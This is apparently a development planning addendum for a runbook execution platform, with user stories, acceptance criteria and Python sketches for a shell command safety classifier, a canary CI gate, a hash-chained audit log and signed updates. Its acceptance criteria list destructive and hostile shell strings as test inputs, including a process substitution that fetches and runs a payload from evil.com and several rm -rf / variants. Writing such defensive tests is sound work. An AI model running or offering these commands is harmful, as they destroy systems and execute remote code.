Per-product surgical additions to existing epics (not cross-cutting):
- P1 route: 8pts (key redaction, SSE billing, token math, CI runner)
- P2 drift: 12pts (mTLS revocation, state lock recovery, pgmq visibility, RLS leak, entropy scrubber)
- P3 alert: 10pts (HMAC replay, claim-check, out-of-order correlation, free tier, tenant isolation)
- P4 portal: 9pts (partial scan recovery, ownership conflicts, Meilisearch rebuild, VCR freshness, free tier)
- P5 cost: 7pts (concurrent baselines, remediation RBAC, Clock interface, property tests, Redis fallback)
- P6 run: 15pts (shell AST parsing, canary suite, intervention TTL, streaming audit, crypto signatures)
Total: 61 story points across 30 new stories
dd0c/run — Epic Addendum (BMad Review Findings)
Source: BMad Code Review (March 1, 2026)
Approach: Surgical additions to existing epics; no new epics created.
Epic 1 Addendum: Runbook Parser
Story 1.7: Shell AST Parsing (Not Regex)
As a safety-critical execution platform, I want command classification to use shell AST parsing (mvdan/sh), so that variable expansion attacks, eval injection, and hex-encoded payloads are caught.
Acceptance Criteria:
- `X=rm; Y=-rf; $X $Y /` classified as Dangerous (variable expansion resolved).
- `eval $(echo 'rm -rf /')` classified as Dangerous.
- `printf '\x72\x6d...' | bash` classified as Dangerous (hex decode).
- `bash <(curl http://evil.com/payload.sh)` classified as Dangerous (process substitution).
- `alias ls='rm -rf /'; ls` classified as Dangerous (alias redefinition).
- Heredoc with embedded danger classified as Dangerous.
- `echo 'rm -rf / is dangerous'` classified as Safe (string literal, not command).
- `kubectl get pods -n production` classified as Safe.
Estimate: 5 points
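To illustrate why structure-aware classification behaves differently from pattern matching, here is a minimal sketch in Python. It is not the mvdan/sh approach the story calls for: it uses the standard-library `shlex` tokenizer as a toy stand-in, tracks simple `NAME=value` assignments, and classifies by the resolved command word. The names `DANGEROUS_COMMANDS`, `split_commands`, and `classify` are hypothetical, and the sketch deliberately ignores most of the cases listed above (eval, process substitution, aliases, heredocs), which is part of the argument for a real AST parser.

```python
import shlex

# Hypothetical deny-list for illustration only; a real policy would be far broader.
DANGEROUS_COMMANDS = {"rm", "mkfs", "dd"}
CONTROL_OPERATORS = {";", "&&", "||", "|"}


def split_commands(script: str) -> list[list[str]]:
    """Tokenize with shell quoting rules, then split on control operators."""
    lexer = shlex.shlex(script, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        # Limitation: quotes are already stripped here, so a quoted ";" would
        # be mistaken for an operator. A real AST keeps that distinction.
        if token in CONTROL_OPERATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def classify(script: str) -> str:
    """Return "Dangerous" if any resolved command word is on the deny-list."""
    env: dict[str, str] = {}
    for words in split_commands(script):
        # Resolve whole-word $NAME references from assignments seen so far.
        words = [env.get(w[1:], w) if w.startswith("$") else w for w in words]
        # Leading NAME=value words are assignments, not the command word.
        while words and "=" in words[0] and words[0].split("=", 1)[0].isidentifier():
            name, value = words.pop(0).split("=", 1)
            env[name] = value
        if words and words[0] in DANGEROUS_COMMANDS:
            return "Dangerous"
    return "Safe"


print(classify("X=rm; Y=-rf; $X $Y /"))
print(classify("echo 'rm -rf / is dangerous'"))
```

A regex looking for the literal text `rm -rf` would miss the first input and flag the second. Classifying by the resolved command word handles both, but only for the narrow cases this toy understands.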
Epic 2 Addendum: Action Classifier
Story 2.7: Canary Suite CI Gate (50 Known-Destructive Commands)
As a safety-first platform, I want a canary suite of 50 known-destructive commands that must ALL be classified as Dangerous, so that classifier regressions are caught before merge.
Acceptance Criteria:
- Suite contains exactly 50 commands (rm, mkfs, dd, fork bomb, chmod 777, kubectl delete, terraform destroy, DROP DATABASE, etc.).
- All 50 classified as Dangerous — any miss is a blocking CI failure.
- Suite count assertion prevents accidental removal of canary commands.
- Runs on every push and PR.
Estimate: 2 points
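The gate described in this story could be sketched as a single check that CI runs, shown here in Python. The function name `check_canary_suite`, the `classify` callable, and the failure-message format are assumptions made for illustration; the real classifier and test harness are not specified here.

```python
from typing import Callable

EXPECTED_CANARY_COUNT = 50  # from the acceptance criteria


def check_canary_suite(
    commands: list[str],
    classify: Callable[[str], str],
    expected_count: int = EXPECTED_CANARY_COUNT,
) -> list[str]:
    """Return failure messages; an empty list means the gate passes."""
    failures = []
    # Count assertion: guards against canaries being silently removed.
    if len(commands) != expected_count:
        failures.append(
            f"expected {expected_count} canary commands, found {len(commands)}"
        )
    # Every canary must be classified as Dangerous; any miss blocks the merge.
    for command in commands:
        if classify(command) != "Dangerous":
            failures.append(f"not classified as Dangerous: {command!r}")
    return failures
```

In CI, a non-empty result would be turned into a failing exit code so the merge is blocked.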
Epic 3 Addendum: Execution Engine
Story 3.8: Intervention Deadlock TTL
As a reliable execution engine, I want manual intervention states to time out after a configurable TTL, so that a stuck execution doesn't hang forever waiting for a human who's asleep.
Acceptance Criteria:
- Manual intervention state transitions to FailedClosed after TTL (default 5 minutes).
- FailedClosed triggers out-of-band critical alert with execution context.
- Human resolution before TTL transitions to Complete (no FailedClosed).
Estimate: 2 points
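A minimal Python sketch of the timeout behavior follows. It assumes time is passed in explicitly so the TTL can be tested without sleeping. The class `Intervention`, its fields, and the `alert` callback are hypothetical names; only the FailedClosed and Complete states and the 5-minute default come from the criteria above.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Callable


class State(Enum):
    AWAITING_INTERVENTION = "AwaitingIntervention"
    COMPLETE = "Complete"
    FAILED_CLOSED = "FailedClosed"


@dataclass
class Intervention:
    execution_id: str
    started_at: float            # seconds, from any monotonic clock
    ttl_seconds: float = 300.0   # default TTL of 5 minutes
    state: State = State.AWAITING_INTERVENTION

    def tick(self, now: float, alert: Callable[[dict], None]) -> State:
        """Fail closed and alert once if the TTL has elapsed."""
        waiting = self.state is State.AWAITING_INTERVENTION
        if waiting and now - self.started_at >= self.ttl_seconds:
            self.state = State.FAILED_CLOSED
            alert({"execution_id": self.execution_id,
                   "waited_seconds": now - self.started_at})
        return self.state

    def resolve(self, now: float, alert: Callable[[dict], None]) -> State:
        """Human resolution; only succeeds if the TTL has not yet elapsed."""
        self.tick(now, alert)
        if self.state is State.AWAITING_INTERVENTION:
            self.state = State.COMPLETE
        return self.state
```

Having `resolve` re-check the deadline first is a design choice in this sketch: a late human response cannot revive an execution that should already have failed closed.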
Epic 5 Addendum: Audit Trail
Story 5.7: Streaming Append-Only Audit with Hash Chain
As a compliance-ready platform, I want audit events streamed immediately (not batched) with a cryptographic hash chain, so that tampering is detectable and events survive agent crashes.
Acceptance Criteria:
- Audit event available within 100ms of command execution (no batching).
- Hash chain: tampering with any event breaks the chain (detected by verify_chain()).
- WAL (write-ahead log): events survive agent crash and are recoverable.
Estimate: 3 points
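The hash-chain criterion can be sketched in Python as below. This assumes SHA-256 over the previous hash plus a canonical JSON encoding of the event; the record layout, the `GENESIS` value, and the `append_event` helper are illustrative assumptions. `verify_chain()` is named in the criteria, but its signature here is a guess. The sketch does not cover streaming or the WAL.

```python
import hashlib
import json

GENESIS = "0" * 64  # assumed placeholder hash preceding the first event


def event_hash(prev_hash: str, payload: dict) -> str:
    """Hash the previous hash together with a canonical encoding of the event."""
    body = json.dumps(payload, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode("utf-8")).hexdigest()


def append_event(chain: list[dict], payload: dict) -> dict:
    """Append one event, linking it to the hash of the previous record."""
    prev_hash = chain[-1]["hash"] if chain else GENESIS
    record = {
        "prev_hash": prev_hash,
        "payload": payload,
        "hash": event_hash(prev_hash, payload),
    }
    chain.append(record)
    return record


def verify_chain(chain: list[dict]) -> bool:
    """Recompute every link; any edited, reordered, or dropped-in-the-middle
    event makes a recomputed hash disagree with the stored one."""
    prev_hash = GENESIS
    for record in chain:
        if record["prev_hash"] != prev_hash:
            return False
        if record["hash"] != event_hash(prev_hash, record["payload"]):
            return False
        prev_hash = record["hash"]
    return True
```

Note that a chain like this cannot by itself detect removal of the most recent events; that would need the latest hash to be anchored somewhere outside the log.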
Story 5.8: Cryptographic Signatures for Agent Updates
As a zero-trust platform, I want agent binary and policy updates signed with the customer's Ed25519 key, so that a compromised SaaS cannot push malicious code to customer infrastructure.
Acceptance Criteria:
- Agent rejects binary update with invalid signature.
- Agent rejects policy update signed only by SaaS key (requires customer key).
- Agent accepts update with valid customer signature.
- On failed signature verification, the agent keeps its existing policy and continues operating (no degradation).
Estimate: 3 points
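The acceptance rule for policy updates could look roughly like the Python sketch below. Ed25519 verification itself is abstracted behind a `verify` callable, since it would come from a cryptography library rather than the Python standard library. The function name `apply_policy_update`, the `signatures` mapping, and its `"customer"` and `"saas"` keys are all hypothetical.

```python
from typing import Callable

# (public_key, message, signature) -> True if the signature is valid.
# In practice this would wrap a real Ed25519 verification routine.
Verifier = Callable[[bytes, bytes, bytes], bool]


def apply_policy_update(
    current_policy: bytes,
    new_policy: bytes,
    signatures: dict[str, bytes],
    customer_public_key: bytes,
    verify: Verifier,
) -> bytes:
    """Return the policy the agent should run after an update attempt."""
    customer_signature = signatures.get("customer")
    # A SaaS-only signature is not enough: the customer's signature is required.
    if customer_signature is None:
        return current_policy
    if not verify(customer_public_key, new_policy, customer_signature):
        # Invalid signature: keep running the existing policy.
        return current_policy
    return new_policy
```

Returning the current policy on every failure path keeps the agent on its last trusted state, rather than leaving it without a policy.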
Total Addendum: 15 points across 5 stories